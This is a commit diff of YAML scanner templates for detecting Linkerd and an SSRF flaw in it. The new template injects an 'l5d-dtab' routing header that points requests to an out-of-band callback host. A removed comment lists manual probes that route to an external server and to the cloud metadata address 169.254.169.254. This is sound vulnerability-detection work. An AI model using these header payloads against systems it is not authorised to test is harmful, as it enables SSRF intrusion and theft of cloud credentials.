commit
c4fa0a9715
|
@ -1,67 +1,21 @@
|
|||
id: linkerd-ssrf-detect
|
||||
|
||||
# Detect the Linkerd service by overriding the delegation table and
|
||||
# inspect the response for:
|
||||
# - a "Via: .. linkerd .."
|
||||
# - a "l5d-err" and/or a "l5d-success" header
|
||||
# - a verbose timeout error (binding timeout)
|
||||
# - a full response
|
||||
# The full-response case indicates a possible SSRF condition, the others
|
||||
# only indicates the service presence.
|
||||
#
|
||||
# If a full-response is returned you should really manually probe requests with
|
||||
# the following header values:
|
||||
#
|
||||
# - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts
|
||||
# - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata
|
||||
id: linkerd-ssrf-detection
|
||||
|
||||
info:
|
||||
name: Linkerd SSRF detection
|
||||
author: dudez
|
||||
severity: info
|
||||
tags: ssrf,linkerd
|
||||
severity: high
|
||||
tags: ssrf,linkerd,oob
|
||||
reference: https://twitter.com/nirvana_msu/status/1084144955034165248
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
headers:
|
||||
l5d-dtab: /svc/* => /$/inet/example.com/443
|
||||
l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
name: via-linkerd-present
|
||||
regex:
|
||||
- '(?mi)^Via\s*?:.*?linkerd.*$'
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: l5d-err-present
|
||||
regex:
|
||||
- '(?mi)^l5d-err:.*$'
|
||||
part: header
|
||||
|
||||
- type: regex
|
||||
name: l5d-success-class-present
|
||||
regex:
|
||||
- '(?mi)^l5d-success-class: 0.*$'
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
name: ssrf-response-body
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- '<p>This domain is for use in illustrative examples in documents.'
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
name: resolve-timeout-error-present
|
||||
regex:
|
||||
- '(?mi)Exceeded .*? binding timeout while resolving name'
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
name: dynbind-error-present
|
||||
regex:
|
||||
- '(?mi)exceeded .*? to unspecified while dyn binding'
|
||||
part: body
|
||||
- "http"
|
|
@ -0,0 +1,32 @@
|
|||
id: linkerd-service-detect
|
||||
|
||||
info:
|
||||
name: Linkerd Service detection
|
||||
author: dudez
|
||||
severity: info
|
||||
tags: tech,linkerd
|
||||
reference: https://twitter.com/nirvana_msu/status/1084144955034165248
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
headers:
|
||||
l5d-dtab: /svc/* => /$/inet/example.com/443
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?mi)^l5d-err:.*$'
|
||||
- '(?mi)^l5d-success-class: 0.*$'
|
||||
- '(?mi)^Via\s*?:.*?linkerd.*$'
|
||||
part: header
|
||||
condition: or
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?mi)Exceeded .*? binding timeout while resolving name'
|
||||
- '(?mi)exceeded .*? to unspecified while dyn binding'
|
||||
part: body
|
||||
condition: or
|
Loading…
Reference in New Issue